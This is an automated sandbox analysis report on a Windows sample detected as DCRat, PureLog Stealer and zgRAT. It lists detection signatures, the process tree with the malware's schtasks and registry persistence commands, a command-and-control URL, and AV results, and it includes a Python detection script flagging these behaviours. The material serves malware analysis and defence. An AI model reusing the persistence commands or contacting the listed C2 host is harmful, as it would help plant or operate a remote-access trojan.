
Windows Analysis Report
KtMg6d1Ivx.exe

Overview

General Information

Sample name: KtMg6d1Ivx.exe (renamed because the original name is a hash value)
Original sample name: b2b416d08c3391ce0842d998e0d5f273.exe
Analysis ID: 1385347
MD5: b2b416d08c3391ce0842d998e0d5f273
SHA1: b384e63d2d57c5c744d1da4e5e92faad09228ab1
SHA256: 54471e79557fcf3f12279ab32be68aee2ca1cfd68e29134d0b34caf6975c3254
Tags: DCRat, exe

Detection

Detection: DCRat, PureLog Stealer, zgRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • KtMg6d1Ivx.exe (PID: 5456 cmdline: C:\Users\user\Desktop\KtMg6d1Ivx.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
    • schtasks.exe (PID: 1488 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3364 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1632 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 5720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6428 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 1876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 4320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 4080 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5636 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6148 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2180 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1096 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2452 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 892 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6428 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6092 cmdline: schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4720 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1864 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1352 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4080 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1488 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 3524 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • Registry.exe (PID: 1848 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
    • csrss.exe (PID: 5720 cmdline: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 6484 cmdline: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 1772 cmdline: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • conhost.exe (PID: 3692 cmdline: C:\Windows\ImmersiveControlPanel\pris\conhost.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • conhost.exe (PID: 4668 cmdline: C:\Windows\ImmersiveControlPanel\pris\conhost.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • csrss.exe (PID: 5948 cmdline: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • Registry.exe (PID: 6660 cmdline: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • Registry.exe (PID: 2408 cmdline: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 6488 cmdline: "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • Registry.exe (PID: 4280 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • conhost.exe (PID: 6576 cmdline: "C:\Windows\ImmersiveControlPanel\pris\conhost.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • csrss.exe (PID: 4996 cmdline: "C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • dZtDLPHWGnqMECrRIGtvnUL.exe (PID: 2924 cmdline: "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe" MD5: B2B416D08C3391CE0842D998E0D5F273)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):
00000000.00000002.2044761761.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.2044761761.000000001307A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(3 further memory-dump entries are not shown in this extract)

Yara matches in unpacked PEs (Source | Rule | Description | Author | Strings):
0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.KtMg6d1Ivx.exe.1b980000.3.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.KtMg6d1Ivx.exe.1b980000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetFilename: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, CommandLine: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, NewProcessName: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, OriginalFileName: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\ImmersiveControlPanel\pris\conhost.exe, ProcessId: 3692, ProcessName: conhost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dZtDLPHWGnqMECrRIGtvnUL
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, ProcessId: 5720, ProcessName: csc.exe
Source: Registry Key set | Author: frack113, Florian Roth (Nextron Systems) | Data: Details: "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ProcessId: 5456, TargetFilename: C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
Source: Process started | Author: vburov | Data: Command: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, CommandLine: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe, ProcessId: 5720, ProcessName: csrss.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline, ProcessId: 5720, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f, CommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentImage: C:\Users\user\Desktop\KtMg6d1Ivx.exe, ParentProcessId: 5456, ParentProcessName: KtMg6d1Ivx.exe, ProcessCommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f, ProcessId: 4080, ProcessName: schtasks.exe

Snort IDS alert:
Timestamp: 02/02/24-04:52:24.865071
Source IP: 192.168.2.5
Source Port: 49711
Destination IP: 185.87.199.107
Destination Port: 80
Protocol: TCP
SID: 2048095
Classtype: A Network Trojan was detected
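The System Summary and Persistence matches above fire on four distinct behaviours: a Windows system-process name (conhost.exe, csrss.exe) started from a directory Windows never ships it in, schtasks.exe creating minute-granularity relaunch tasks for those binaries, the Winlogon\Shell value extended beyond explorer.exe, and csc.exe compiling a response file out of %TEMP% for a non-developer parent. The script below replays those behaviours as Sysmon-style events and flags each of them. It is an added example, not Joe Sandbox's code nor the cited Sigma rules; the EVENTS list is constructed from this report's own process tree and registry data, the directory and parent allow-lists are assumptions, and the "staging directory" Run-key rule is a heuristic that no Sigma rule on this page uses.

```python
"""Replay of the behaviour behind the System Summary and Persistence signature matches
above, added as an example; it is neither Joe Sandbox's code nor the cited Sigma rules.
EVENTS are Sysmon-style records constructed from this report's process tree and
registry data (EventID 1 = process create, EventID 13 = registry value set)."""
import re
from pathlib import PureWindowsPath

# Windows runs these image names only from SYSTEM_DIRS; the same name elsewhere is a masquerade.
SYSTEM_PROCESS_NAMES = {"conhost.exe", "csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
                        "services.exe", "lsass.exe", "svchost.exe", "dwm.exe", "securityhealthsystray.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")
DEV_PARENTS = {"powershell.exe", "pwsh.exe", "msbuild.exe", "devenv.exe", "dotnet.exe"}  # assumed legit csc.exe drivers
STAGING_DIRS = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")  # heuristic first-stage drop locations
OPT_TR = re.compile(r"/tr\s+\"?'?([^'\"]+)", re.I)  # schtasks action, quoted as "'path'" in this report
OPT_WORD = {o: re.compile(rf"/{o}\s+(\S+)", re.I) for o in ("sc", "mo", "rl")}
CSC_TEMP_RSP = re.compile(r"@\"?[^\"\s]*\\appdata\\local\\temp\\", re.I)  # @response-file under %TEMP%

def basename(path):
    return PureWindowsPath(path).name.lower()

def is_masquerade(image):
    p = PureWindowsPath(image)
    return p.name.lower() in SYSTEM_PROCESS_NAMES and not str(p.parent).lower().startswith(SYSTEM_DIRS)

def opt(cmd, name):
    m = OPT_WORD[name].search(cmd)
    return m.group(1).upper() if m else None

def check_schtasks(ev):
    cmd = ev["CommandLine"]
    if basename(ev["Image"]) != "schtasks.exe" or "/create" not in cmd.lower():
        return None
    m = OPT_TR.search(cmd)
    if not m:
        return None
    target = m.group(1).strip()
    if is_masquerade(target):
        return ("schtasks_target_masquerades_system_process", target)
    # Minute-granularity relaunch tasks are the watchdog pattern, not a normal updater schedule.
    if opt(cmd, "sc") == "MINUTE" and int(opt(cmd, "mo") or 0) <= 15:
        return ("schtasks_minute_interval_relaunch", f"{target} every {opt(cmd, 'mo')} min, rl={opt(cmd, 'rl')}")
    return None

def check_csc(ev):
    if basename(ev["Image"]) != "csc.exe":
        return None
    if CSC_TEMP_RSP.search(ev["CommandLine"]) and basename(ev["ParentImage"]) not in DEV_PARENTS:
        return ("csc_compiles_from_temp_for_non_dev_parent", ev["ParentImage"])
    return None

def check_registry(ev):
    key = ev["TargetObject"].lower()
    # Winlogon\Shell should be exactly "explorer.exe"; extra entries run beside the shell at every logon.
    if key.endswith("\\winlogon\\shell") and ev["Details"].strip().lower() != "explorer.exe":
        return ("winlogon_shell_value_extended", ev["Details"])
    if "\\currentversion\\run\\" in key and any(s in ev["Image"].lower() for s in STAGING_DIRS):
        return ("run_key_written_by_binary_in_staging_dir", ev["TargetObject"] + " = " + ev["Details"])
    return None

def evaluate(events):
    """Return one finding dict per (event, rule) pair that matched."""
    findings = []
    for ev in events:
        hits = []
        if ev["EventID"] == 1:
            if is_masquerade(ev["Image"]):
                hits.append(("system_process_name_outside_system_dir", ev["Image"]))
            hits += [r for r in (check_schtasks(ev), check_csc(ev)) if r]
        elif ev["EventID"] == 13:
            hits += [r for r in (check_registry(ev),) if r]
        findings += [{"rule": rule, "pid": ev["ProcessId"], "detail": d} for rule, d in hits]
    return findings

KTMG, SCHTASKS = r"C:\Users\user\Desktop\KtMg6d1Ivx.exe", r"C:\Windows\System32\schtasks.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
EVENTS = [  # constructed from the report's process tree and Sigma data
    {"EventID": 1, "ProcessId": 3692, "ParentImage": "", "Image": r"C:\Windows\ImmersiveControlPanel\pris\conhost.exe",
     "CommandLine": r"C:\Windows\ImmersiveControlPanel\pris\conhost.exe"},
    {"EventID": 1, "ProcessId": 5720, "ParentImage": KTMG, "Image": r"C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe",
     "CommandLine": r"C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe"},
    {"EventID": 1, "ProcessId": 1488, "ParentImage": KTMG, "Image": SCHTASKS,
     "CommandLine": r'''schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f'''},
    {"EventID": 1, "ProcessId": 1096, "ParentImage": KTMG, "Image": SCHTASKS,
     "CommandLine": r'''schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f'''},
    {"EventID": 1, "ProcessId": 5720, "ParentImage": KTMG, "Image": CSC,
     "CommandLine": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline'},
    # Genuine conhost.exe spawned for csc.exe: same name, correct directory, must not fire.
    {"EventID": 1, "ProcessId": 4720, "ParentImage": CSC, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"EventID": 13, "ProcessId": 5456, "Image": KTMG,
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "Details": r'explorer.exe, "C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe"'},
    {"EventID": 13, "ProcessId": 5456, "Image": KTMG,
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry",
     "Details": r'"C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"'},
]

if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f'{f["rule"]:<45} pid={f["pid"]:<5} {f["detail"]}')
```

Run as-is it prints seven findings: two masquerades, one relaunch task, one task pointing at a masqueraded conhost.exe, the csc.exe compile, and the two registry writes, while the genuine C:\Windows\System32\conhost.exe that csc.exe spawned stays silent. The directory check is what separates the two conhost.exe events; matching on the image name alone would drown the signal in every real console host on the box.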


AV Detection

Source: KtMg6d1Ivx.exe | Avira: detected
Source: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php | Avira URL Cloud: Label: malware
Source: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/ | Avira URL Cloud: Label: malware
Source: http://185.87.199.107 | Avira URL Cloud: Label: malware
Source: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncP | Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat | Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | ReversingLabs: Detection: 75%
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Virustotal: Detection: 72%
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | ReversingLabs: Detection: 75%
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Virustotal: Detection: 72%
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | ReversingLabs: Detection: 75%
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Virustotal: Detection: 72%
Source: C:\Users\user\Desktop\bveMYDWO.log | Virustotal: Detection: 11%
Source: C:\Users\user\Desktop\vnUJHstD.log | Virustotal: Detection: 11%
Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | ReversingLabs: Detection: 75%
Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Virustotal: Detection: 72%
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | ReversingLabs: Detection: 75%
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Virustotal: Detection: 72%
Source: KtMg6d1Ivx.exe | ReversingLabs: Detection: 75%
Source: KtMg6d1Ivx.exe | Virustotal: Detection: 72%
